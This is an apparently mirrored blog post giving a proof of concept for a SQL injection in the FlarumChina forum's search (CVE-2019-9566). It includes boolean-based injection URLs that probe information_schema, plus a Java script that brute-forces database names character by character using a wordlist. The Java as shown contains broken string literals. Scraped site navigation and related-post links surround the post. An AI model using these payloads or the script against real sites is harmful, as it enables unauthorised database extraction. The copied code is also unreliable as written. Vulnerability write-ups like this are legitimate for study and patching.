zoukankan      html  css  js  c++  java
  • FlarumChina SQL injection Vulnerability(CVE-2019-9566)

    First,We need to download our vulnerable program in GitHub

    links:https://github.com/skywalker512/FlarumChina/

    Vulnerable versions: <= FlarumChina-beta.7C

    When the build is completed, the following image will be displayed

    So,The SQL Injection Vulnerability in Search Engine

    You just need to visit the following links to make your judgment:

    (1).http://127.0.0.1/?q=1%' and 1=1 --+

    (2).http://127.0.0.1/?q=1%' and 1=2 --+

    So, by returning the different pages mentioned above, we can see that there is a SQL injection vulnerability in this place.

    Of course, I also wrote a script in Java to get the database name.

    Although not perfect.

    Principle:

    http://localhost/?q=1%' and substr((select schema_name from information_schema.schemata limit 1,1),1,1)='f' --+

    This link is returned when the page is normal.

    So use this link to judge in my Java program

    Java Poc:

     1 import java.io.BufferedReader;
     2 import java.io.FileReader;
     3 import java.io.IOException;
     4 import java.io.InputStreamReader;
     5 import java.net.MalformedURLException;
     6 import java.net.URL;
     7 import java.net.URLConnection;
     8 
     9 public class work {
    10 
    11     public static void main(String[] args) throws IOException {
    12         BufferedReader in = null;
    13         URL url = null;
    14         String str = null;
    15         for(int j=0;j<6;j++) {
    16             String bm=String.valueOf(j);
    17             System.out.print(bm+":");
    18             for (int i=1;i<25;i++) {
    19                 String cs=String.valueOf(i);
    20                 in = new BufferedReader(new FileReader("C:\Users\DELL\Desktop\superdic.txt"));
    21                 while((str = in.readLine()) != null) {
    22                     String urlPath = "http://localhost/?q=1%%27%20and%20substr((select%20schema_name%20from%20information_schema.schemata%20limit%20"+bm+",1),"+cs+",1)='"+str+"'%20--+";
    23                     try {
    24                         url = new URL(urlPath);
    25                     } catch (MalformedURLException e) {
    26                         System.out.println("error:"+cs);
    27                     } 
    28                     URLConnection conn = url.openConnection();
    29                     conn.setDoInput(true); 
    30                     BufferedReader br = new BufferedReader(new InputStreamReader(conn.getInputStream())); 
    31                     StringBuilder sb = new StringBuilder(); 
    32                     String line = null; 
    33                     while((line = br.readLine()) != null) {
    34                         sb.append(line);
    35                     }
    36                     if(sb.indexOf("http://localhost/d/2") != -1) {
    37                         if("+".equals(str)) {
    38                             break;
    39                         }
    40                         System.out.print(str);
    41                         break;
    42                     }
    43                 }
    44                 if("+".equals(str)) {
    45                     break;
    46                 } 
    47             }
    48             System.out.print("
    ");
    49         }
    50         in.close();
    51     }
    52 
    53 }
    View Code

     

    Because I don't know how many databases there are, I'm going to run six for loops for the time being.

    So the fifth line returned by the script does not have any output.

    You can also use sqlmap directly to obtain of data.

    Database:

    But most websites are delayed, so script testing is recommended.

  • 相关阅读:
    Stream流之三级查询
    SpringBoot日期格式的设置
    el表达式
    SpringMV+HuTool之验证码登录
    Spring注解详解
    @ResponseBody注解使用(返回字符串并不跳转)
    每日leetcode-数组-589. N 叉树的前序遍历
    python apply函数
    剑指offer-JZ6 旋转数组的最小数字
    torch.manual_seed()函数
  • 原文地址:https://www.cnblogs.com/wh4am1/p/10257593.html
Copyright © 2011-2022 走看看